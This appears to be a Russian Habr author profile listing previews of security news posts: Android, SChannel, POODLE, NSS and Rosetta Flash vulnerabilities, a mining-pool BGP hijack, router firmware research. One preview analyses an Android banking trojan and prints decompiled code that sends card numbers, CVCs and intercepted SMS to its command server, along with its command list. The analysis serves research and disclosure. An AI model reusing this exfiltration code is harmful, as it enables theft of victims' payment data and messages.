Pull to refresh
1210
0.3

Пользователь

Send message

Уязвимость в Android < 5.0 (ObjectInputStream)

Reading time1 min
Views21K
Как сообщает Jann Horn в рассылке Full Disclosure, в Android 5.0 включили патч, который исправляет уязвимость в объекте java.io.ObjectInputStream. До этого патча java.io.ObjectInputStream не проверял, является ли объект сериализируемым, перед его де-сериализацией.

Атакующему достаточно создать экземпляр любого класса с конструктором без параметров и наполнить его поля случайными значениями. При срабатывании сборщика мусора, у этого экземпляра будет вызван метод finalize. В конечном итоге, если передать этот экземпляр в сервис system_service через Intents с Bundles, произойдет перезапись указателя на адрес, подконтрольный злоумышленнику, и если ему удастся записать нужный payload на этот адрес, код атакующего выполнится с привилегиями system_service.
Читать дальше →
Total votes 32: ↑29 and ↓3+26
Comments19

Критическая уязвимость в Microsoft SChannel

Reading time1 min
Views22K
Пользователи Windows, я думаю, были несколько расстроены, что OpenSSL Heartbleed их практически не затронул. Теперь же и они могут повеселиться, ведь у них есть аналогичная уязвимость!

Вчера Microsoft опубликовала Security Bulletin MS14-066, в котором описывается критический баг в SChannel — реализации SSL/TLS от Microsoft, который позволяет злоумышленнику удаленно выполнять произвольный код. Обновления, закрывающую уязвимость, уже доступны через Windows Update.

Подвержены все версии Windows, начиная с 2003, в том числе и Windows RT. Это позволяет предположить, что уязвимость имеется не только на стороне сервера, но и на стороне клиента.
Читать дальше →
Total votes 35: ↑33 and ↓2+31
Comments11

Facebook официально доступен в Tor

Reading time1 min
Views62K
Произошло то, что как бы совсем не ждали, совершенно. У Facebook появилось официальное зеркало в Tor.
facebookcorewwwi.onion

В Facebook говорят, что большое количество пользователей используют Tor для посещения соцсети, и часто срабатывает защита от взлома аккаунта из-за резкой смены страны, поэтому Facebook и решили сделать возможность посещать соцсеть минуя Exit-ноды.

Зеркало доступно только по HTTPS. Как сообщается в анонсе, это сделано из-за архитектурных особенностей: Tor-демон работает как реверс-прокси в основную инфраструктуру через интернет, и HTTPS применяется для шифрования и аутентификации на транспортном уровне от Tor до серверов Facebook.
Читать дальше →
Total votes 70: ↑60 and ↓10+50
Comments86

Уменьшаем потребление CPU Skype под Linux и Mac OS

Reading time1 min
Views71K
image Skype. Как мы его любим и одновременно ненавидим. Долгое время, Skype был единственной программой, которую я старался закрывать при работе лаптопа от батареи: потреблял около 4% CPU, будил процессор 250-300 раз в секунду, ничего при этом не делая, оставляя процессору меньше времени на нахождение в более энергосберегающем состоянии.

Увидел я однажды комментарий пользователя Vayun:
Возможно проблема проявляется не у всех, проверить легко: запускаем скайп, запускаем top (на ноутбуке работающем от батареи наглядней будет powertop) и смотрим сколько он отъедает cpu.

Я долго не возился, придавил только poll, увеличив timeout. Это даёт наибольший выигрыш (уменьшая %CPU скайпа раз в 5), но наверное можно лучше.

Собственно, вот: Skype-poll-fix. Увеличивает таймаут у вызовов poll (Linux) и kevent (Mac OS), снижая потребление процессора в 4-5 раз.
Читать дальше →
Total votes 76: ↑72 and ↓4+68
Comments67

Уязвимость SSLv3 POODLE — как BEAST, только проще

Reading time2 min
Views63K
собак
Как вы, возможно, знаете, в SSLv3 обнаружена возможность Padding Oracle атаки, которая позволяет злоумышленнику, имеющему какую-либо возможность отправлять свои данные на сервер по SSLv3 от имени жертвы, расшифровывать по 1 байту за 256 запросов. Происходит это из-за того, что в SSLv3 padding не учитывается в MAC.

Теоретически, реализовать атаку можно на любой сервис, где есть возможность влиять на отправляемые данные со стороны атакуемого. Проще всего это реализовать, например, если злоумышленнику необходимо получить Cookie на HTTPS-странице, добавляя свой код на HTTP-страницы, который делает подконтрольные запросы на HTTPS-страницы, и подменяя шифрованные блоки.

В любом случае, атакующему необходимо:
  • Иметь возможность прослушивать и подменять трафик атакуемого
  • Иметь возможность совершать запросы от имени атакуемого с известным атакующему текстом


Уязвимость не зависит от конкретной реализации, она by design. Хоть уязвимость и затрагивает только CBC-режим, лучше отключить SSLv3 полностью. Время SSL прошло.
Читать дальше →
Total votes 53: ↑53 and ↓0+53
Comments51

Исследуем китайские роутеры на RT5350

Reading time7 min
Views139K
Однажды, lolipop купил роутер на алиэкспрессе. Да не простой роутер, а очень компактный и дешевый, с 2 Ethernet-портами, USB, да еще и от фирмы, которая в начале 2000-х продавала свои mp3-плееры на территории РФ: Nexx WT1520H.
image
Стандартная прошивка, как и почти всегда, была скудная, и, конечно же, хотелось заменить ее на что-то более вменяемое. Но вот незадача — никаких альтернативных прошивок под роутер нет, и прошить непонятно как, т.к. никакие другие прошивки не принимались через веб-интерфейс, заголовок прошивки я раньше такой не видел, да и binwalk ничего в ней не находил, стало быть, она зашифрована:
00000000  32 33 35 30 6b d9 39 00  00 00 0e 02 00 00 00 00  |2350k.9.........|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 3e 19 53 c5  |............>.S.|
00000020  63 f5 51 9f 82 74 2d 03  2e 2f 1f 32 9c 4a 93 96  |c.Q..t-../.2.J..|
00000030  15 82 23 d0 b2 7e d7 1b  13 c3 1b 1f 06 fa f8 e0  |..#..~..........|
00000040  bb 43 9b c6 ee fc 4b 7a  e6 50 71 2b f4 f3 95 c3  |.C....Kz.Pq+....|
00000050  63 d0 a3 9c 92 2e 16 c6  19 1c 4a 93 cb 95 c3 63  |c.........J....c|
00000060  d2 9b 1a f5 2e 16 c6 19  1c 4a 93 f9 68 3c 9c 73  |.........J..h<.s|
00000070  14 63 d5 10 5e d3 6b 25  2b c2 2e 07 eb 85 73 25  |.c..^.k%+.....s%|
00000080  9b 6b c0 f2 d8 9b cf 65  56 ac a9 c2 28 61 dd 55  |.k.....eV...(a.U|
00000090  18 a4 5b e9 ba 11 93 ec  30 76 4f 40 c1 f0 7c cb  |..[.....0vO@..|.|
000000a0  36 d3 b3 93 fe 3d 6b 10  66 fa 43 39 f2 f6 c0 91  |6....=k.f.C9....|

lolipop слил данные с флешки через программатор, и мы начали в них ковыряться.
Читать дальше →
Total votes 169: ↑169 and ↓0+169
Comments32

Уязвимость в проверке подписей сертификатов в библиотеке NSS

Reading time1 min
Views5.5K
Иногда так бывает, что уязвимости льются одна за другой. Пока все обсуждают ShellShock, Mozilla и Google обновляют свои браузеры Firefox и Chrome, чтобы закрыть достаточно серьезную уязвимость, которая может, при определенных обстоятельствах, привести к подделке подписи SSL-сертификата.

Библиотека Network Security Services (NSS), которая используется для криптографии в браузерах Firefox и Chrome, неправильно обрабатывала padding в подписях по стандарту PKCS#1 v1.5 из-за уязвимости в ASN.1-кодировании DigestInfo.
Уязвимость реализации заключается в том, что DigestInfo обрабатывался, будто он закодирован в BER, из-за чего было возможно закодировать один и тот же ASN.1-объект разными способами. Парсер не учитывал некоторые байты в процедуре проверки сертификатов, что позволяло подделывать сертификаты, если при его создании была использована маленькая публичная экспонента (например, 3).
Читать дальше →
Total votes 16: ↑15 and ↓1+14
Comments3

Грозный пират утонул из-за протекающей капчи

Reading time1 min
Views84K
image

Как вы можете помнить, в октябре 2013 ФБР закрыли Silk Road и нашли его администратора — Росса Уильяма Уильбрихта. Многие строили догадки, как же так могло получиться, как такой серьезный человек мог так просто деанонимизироваться.

Оказалось все чрезвычайно просто: Росс не настроил свой сервер для выхода в обычный интернет через Tor (запросы в интернет шли напрямую), а капча, которая использовалась на странице логина, подгружала данные из интернета, таким образом раскрывая не только факт показа капчи, но и IP-адрес сервера, на котором хостится Silk Road.
Читать дальше →
Total votes 124: ↑113 and ↓11+102
Comments41

Как я позорно деактивировал ботнет

Reading time10 min
Views191K
image

Разместил я, ничего не подозревая, объявление на avito.ru. Сколько раз туда ходил! Но на этот раз как-то не удалось…
Я давно был уверен, что многие нехорошие люди парсят телефонные номера с этого сайта, так что такси, строительные материалы, скорая компьютерная помощь, «8-800-555-3-555 — проще позвонить, чем у кого-то занимать» и приглашения на битву экстрасенсов для меня уже привычное дело, но на этот раз было нечто новое.

Приходит мне СМС-сообщение с текстом: «Зaинтерсoвaлo вaше oбьявление кaк нaсчет oбменa нa http://…». Прямо вот так, с пропущенным знаком препинания и ошибками. А по ссылке качается avito.apk. Интересно.

Исследование APK


Ну, подумал я, надо бы глянуть, что этот APK делает. Результат привычной для меня связки из apktool + dex2jar + jd-gui меня не удовлетворил, т.к. не было видно часть классов деревом, хотя доступ по ссылкам к ним получить было можно. Решил я воспользоваться новомодными онлайн-sandbox'ами — и декомпилированный код получил, и информацию, и pcap-файл со сдампленным трафиком. Как оказалось, этот файл загружали до меня, поэтому в мои руки попал более ранний анализ, что было достаточно полезно.

Итак, что умеет этот троян:
  • delivery&&& — рассылка СМС-сообщений на номера из телефонной книги с заданным текстом
  • sent&&& — отправка заданных СМС-сообщений с сервера
  • rent&&& — перехват всех СМС-сообщений и отправка их на сервер
  • sms_stop&&& — отмена перехвата СМС-сообщений
  • ussd&&& — USSD-запрос
  • call_1&&& — установка и отмена безусловной переадресации

Немного кода из моих заметок
protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(c())));
            arraylist.add(new BasicNameValuePair("number", b));
            arraylist.add(new BasicNameValuePair("month", Integer.toString(c.intValue())));
            arraylist.add(new BasicNameValuePair("year", Integer.toString(d.intValue())));
            arraylist.add(new BasicNameValuePair("cvc", Integer.toString(e.intValue())));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("set_card.php").toString());
    }






    protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("info", com.avito.a.c.b(b)));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("get.php").toString());
    }




    protected HttpRequestBase a()
    {
        try
        {
            JSONObject jsonobject = new JSONObject();
            jsonobject.put("text", c);
            jsonobject.put("number", d);
            jsonobject.put("date", e);
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("sms", jsonobject.toString()));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        catch(JSONException jsonexception)
        {
            jsonexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("load_sms.php").toString());


Помимо этих команд, троян отключает Wifi Sleep, пытается получить доступ к зашифрованному хранилищу и установить себя в качестве Android-администратора (естественно, при этом используются стандартные диалоги ОС, где можно отменить данное действие). Код трояна не обфусцирован, некоторые строки закодированы base64. Вообще непонятно, что это за троян такой. То ли его собирали копипастой, то ли он основан на каком-то другом трояне, то ли еще что, но в нем имеются строки на португальском, немецком, английском, Ubuntu-шрифты, форма для перехвата данных из приложения немецкого банка Commerzbank, значок какой-то игры и флеш-плеера.
Читать дальше →
Total votes 368: ↑362 and ↓6+356
Comments143

Хакеры воровали криптовалюту подменой BGP-анонсов mining pool'ов

Reading time1 min
Views21K
image

По информации от команды Dell SecureWorks Counter Threat Unit, неизвестные лица анонсировали IP-адреса крупных mining pool'ов криптовалют Bitcoin, Dogecoin, HoboNickels и Worldcoin в течение 4 месяцев: с 3 февраля по 12 мая 2014 года. Провернуть такое было возможно из-за отсутствия как проверки подлинности сервера, так и шифрования в протоколе Stratum, который используется большинством пулов.

Первые ноты подозрительной активности заметил пользователь caution с форума bitcointalk 22 марта. Его майнеры подключились к неизвестному IP-адресу и, по какой-то причине, перестали майнить.

Злоумышленники анонсировали IP-адреса пулов только на короткое время, вероятно, всего в течение нескольких минут или секунд, завершали TCP-соединение, всем переподключившимся майнерам отправляли команду reconnect с указанием адреса своего mining pool, затем убирали анонс. Всего им удалось заполучить около $83000 за все 4 месяца.
Читать дальше →
Total votes 40: ↑40 and ↓0+40
Comments18

McSema — декомпилятор кода в LLVM

Reading time1 min
Views8.1K
Ребята, которые выступали на ReCON 2014, опубликовали свой инструмент McSema (MC-Semantics) для восстановления x86-бинарников Windows в LLVM-код. Этот инструмент разделен на несколько подпроектов:
  • Восстановление порядка выполнения
  • Семантика инструкций
  • Парсинг бинарных файлов
  • Семантика тестирования

На данный момент, программа поддерживает трансляцию x86-семантики с целочисленной арифметикой, арифметикой с плавающей точкой и векторными операциями.

Для чего это нужно? Этот проект, в теории, позволит делать сумасшедшие порты бо́льшему количеству людей и в более короткие сроки, позволит более-менее избавляться от обфускации malware путем ее перекомпиляции с оптимизациями.
Проект финансируется DARPA.
Читать дальше →
Total votes 29: ↑28 and ↓1+27
Comments7

Немножко уязвимостей в OpenSSL

Reading time2 min
Views12K
Команда разработчиков OpenSSL выпустила Security Advisory, в котором рассказывается о 9 новых уязвимостях в OpenSSL, и настоятельно рекомендуют обновляться:
  • Пользователям OpenSSL 0.9.8 до версии 0.9.8zb
  • Пользователям OpenSSL 1.0.0 до версии 1.0.0n
  • Пользователям OpenSSL 1.0.1 до версии 1.0.1i

Исправленные уязвимости:

  • Information leak in pretty printing functions (CVE-2014-3508) — приводит к утечке информации из стека при использовании функций «красивого» вывода.
  • Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139) — приводит к падению клиента (из-за null pointer dereference), если сервер будет использовать SRP ciphersuite.
  • Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509) — сервер злоумышленника может записать до 255 байт на клиенте.
Читать дальше →
Total votes 42: ↑40 and ↓2+38
Comments17

Какую архитектуру IM вы считаете приемлемой?

Reading time2 min
Views17K
Всем здравствуйте.
Я всерьез задумался над отсутствием вменяемой, безопасной альтернативы Skype. Даже не альтернативы самому мессенджеру, а отсутствием протоколов, которые объединяли бы в себе и обмен текстовыми сообщениями, и многопользовательские чаты, и гарантированную (с пробивкой NAT и/или использованием релеев) передачу голоса, видео и файлов. Разработать такой протокол, чтобы он удовлетворял всех, достаточно сложно, поэтому мне бы хотелось услышать, во-первых, мнение хабрасообщества на этот счет, а во-вторых, зарубежных пользователей с Reddit.

Я вкратце опишу преимущества и недостатки некоторых текущих архитектур, если вы забыли или не знали какие-то моменты. Во всех описаниях архитектур подразумевается их безопасная реализация.

P2P
По этой модели был построен Skype, сейчас делают Tox, да и множество других менее известных мессенджеров. Преимущество заключается в том, что не требуется никаких серверов (или близко к этому) для поддержания работы сети, требуется только, как правило, какие-то начальные ноды, и (в зависимости от архитектуры) сервер авторизации. Все коммуникации происходят напрямую от пользователя к пользователю, что, во-первых, раскрывает IP-адреса участников, а во-вторых, совершенно неприемлемо для мобильных устройств и в мобильных сетях, из-за высокого расхода батареи и трафика. Среди недостатков, также можно отметить отсутствие оффлайн-сообщений и синхронизации истории сообщений без другой, запущенной под этим логином, ноды. Также, к счастью, не так уж и часто, P2P мессенджерам не удается пробить NAT, и связь напрямую становится невозможна. В таком случае, либо связь вообще не устанавливается, либо используются серверы-релеи.
Читать дальше →
Total votes 21: ↑13 and ↓8+5
Comments39

Немного Tor/I2P/Tails/СОРМ-3

Reading time2 min
Views67K
Так. Слишком много за последние полторы недели произошло, поэтому будет в один пост.

Tor


Выступление на BlackHat отменили

Каждый сможет взломать Tor за 3000$ (@MagisterLudi) — говорили ребята, которым запретили выступать на BlackHat. Они хотели выступать от имени организации Carnegie Mellon’s Software Engineering Institute, в которой и проводились исследования, но им не дали права на публичное распространения этого материала. Подробности особо неизвестны: исследователи сообщили о баге только Tor Core Developers, но, вроде как, все друг друга поняли, и работы по устранению бага уже ведутся.

Сообщение в рассылке Torproject;
Немного информации в PCWold;
На xaker.ru;
Более ранняя заметка на arstechnica.com.

Sniper attack

image

Наконец-то выложили подробности атаки, о которой сообщалось в блоге Torproject в конце января. Эта атака позволяла, во-первых, жрать память на exit-node до ее неработоспособности при очень низком использовании ресурсов на стороне атакующего, во-вторых, позволяла анонимно деанонимизировать hidden service при атаке от 4 до 278 часов на него. Проблема была в некорректной работе с TCP Window Size/Flow Control и команде SENDME. Решили добавлением некой аутентификации на SENDME (на самом деле, просто небольшая проверка). Баг устранен в версии 0.2.4.14-alpha.
Читать дальше →
Total votes 76: ↑73 and ↓3+70
Comments51

Взламываем Asus RT-AC66U и подготавливаемся к SOHOpelesslyBroken CTF

Reading time9 min
Views88K
Наконец-то настал июль, время собираться на DEFCON. Фолловьте @defconparties в твиттере и определяйтесь, какие местечки посетить и на какие доклады сходить.

В этом году будет новое соревнование — SOHOpelesslyBroken, от ISE и EFF. Цель Track 0 состоит в том, чтобы показать ранее неизвестные уязвимости в домашних беспроводных роутерах. Track 1 будет проходить в режиме CTF прямо во время DEFCON. CTFы всегда очень веселые, а конкретно этот подразумевает взлом реального железа, что веселее вдвойне!

image
Ага, это мое рабочее место =P

Меня очень интересует EFF Open Wireless Router (переводчика, к слову, тоже), но они пока ничего не рассказывают об устройстве. В правилах соревнования значится ASUS RT-AC66U (HW Ver. A2) [Version 3.0.0.4.266] в качестве возможного устройства для взлома. У меня есть лишний RT-AC66U дома, поэтому я решил написать небольшой туториал для всех участников соревнования CTF
Читать дальше →
Total votes 51: ↑51 and ↓0+51
Comments11

VolksPC — Android и Debian одновременно

Reading time1 min
Views24K
Разработчики MicroXWin — Xorg сервера режима ядра — вовсю заняты своим новым детищем VolksPC.
VolksPC это компьютер, на котором можно запустить Android и Debian одновременно, на полной скорости железа, и переключаться между ними горячей клавишей. Никакой эмуляции, никаких VNC, никакой заморозки состояний: две полноценные системы работают одновременно.
Системы также полностью независимы друг от друга. Вы можете выгрузить Android и пользоваться только Debian, и наоборот.



Видео никоим образом не отредактировано, на нем показана реальная скорость запуска и работы приложений.
Читать дальше →
Total votes 38: ↑36 and ↓2+34
Comments33

Релиз KDE Plasma 5.0 и KDE Frameworks 5

Reading time2 min
Views71K
image

Вот и дождались. Сегодня (15 июля 2014) вышла KDE Plasma 5.0, а в начале июля вышел набор библиотек для нового KDE — KDE Frameworks 5.

KDE Frameworks 5


Сначала о втором. KDE Frameworks теперь гораздо более модульный. Библиотеки теперь разделены на категории и «уровни» (tiers). Всего существует три категории: Functional, Integration и Solution. Functional-модули не имеют никаких зависимостей времени исполнения, Integration-модули могут их иметь для интеграции с системой и/или в зависимости от системы, а Solution имеют зависимости от других библиотек.

Уровни устанавливают степень зависимости. Пакеты первого уровня не зависят от других пакетов, а только от Qt и схожих низкоуровневых библиотек. Пакеты второго уровня могут зависеть только от пакетов первого уровня, а пакеты третьего уровня могут зависеть от других пакетов 3, 2 или 1 уровней. Пакеты называются «Frameworks»

KDE Frameworks 5 принес несколько интересных новых пакетов и обновил старые:
  • KArchive — библиотека для работы с любыми архивами
  • ThreadWeaver — гибкий менеджер управления потоками
  • KConfig — библиотека для управления файлами конфирураций
  • Solid — получение информации о железе
  • KI18n — gettext-враппер


KDE Plasma 5.0


  • Новая (плоская) тема Breeze. Доступен светлый и темный вариант. Выглядит здорово, высококонтрастно, чисто
  • Новый экран блокировки
  • Новые нескучные обои
  • Полное аппаратное ускорение через OpenGL и OpenGL ES. Теперь Plasma должна работать на любых устройствах, в том числе встраиваемых
  • Переработаны лаунчеры Kicker и Kickoff. Теперь они выглядят несколько лучше, работать с ними немного удобней, занимают они чуть меньше места
  • Улучшения в панели уведомлений. Меньше попапов, ускорена анимация и переходы
  • Улучшенная поддежка Hi-DPI дисплеев
Читать дальше →
Total votes 59: ↑54 and ↓5+49
Comments57

Rosetta Flash — кодирование SWF для вызова из JSONP

Reading time2 min
Views6K
Michele Spagnuolo, специалист по безопасности Google, написал утилиту, которая может закодировать любой SWF-файл любым словарем.
Зачем это нужно? Все очень просто — такой файл можно передать в качестве параметра callback в JSONP на сайте, с которого вам нужно получить информацию, таким образом, вы сможете обойти Same Origin Policy.
Эта проблема была достаточно давно известна, однако, ей не уделяли особого внимания именно из-за того, что получить SWF-файл, состоящий только из символов, которые можно задать как параметр callback, было крайне сложно, однако, сейчас такой инструмент появился.
Утилита использует zlib, алгоритм Хаффмана и брутфорс контрольной суммы ADLER32.

Из крупных сервисов, были уязвимы:
  • Сервисы Google (accounts.google.com, books.google.com, maps.google.com)
  • Youtube
  • Ebay
  • Instagram
  • Twitter
  • Tumblr
  • Olark
Читать дальше →
Total votes 29: ↑28 and ↓1+27
Comments7

Статистика применяемых средств блокирования сайтов

Reading time2 min
Views65K
Собрал я тут своим вирусом статистику по применяемым типам блокировки сайтов на стороне провайдера.

Названия провайдеров могут оказаться неточными из-за того, что GeoIP-база от MaxMind применялась свежая, а вот GeoISP-базу свежую мне украсть не удалось, поэтому использовалась версия от сентября 2012 года. Из-за этого, иногда в базе можно встретить измерение из России, но провайдера, например, из Чехии. Впрочем, это не проблема.

Итак, некоторые данные:
  • 5076 уникальных (в плане IP, а не провайдера) измерения из РФ
  • 815 провайдеров
  • 315 городов
Читать дальше →
Total votes 49: ↑45 and ↓4+41
Comments35

Cisco убрали backdoor из VoIP и Jabber-контроллера

Reading time1 min
Views14K
image

Пару дней назад Cisco выпустила обновление безопасности для Cisco Unified Communications Domain Manager, в котором убрала приватный SSH-ключ root-пользователя.
Да-да, вы все правильно поняли — в прошивке VoIP-контроллера хранился не только публичный ключ аккаунта «support», но и приватный ключ, который можно было извлечь из прошивки и подключиться к любому контроллеру с правами пользователя root
Читать дальше →
Total votes 28: ↑25 and ↓3+22
Comments14

Information

Rating
1,803-rd
Registered
Activity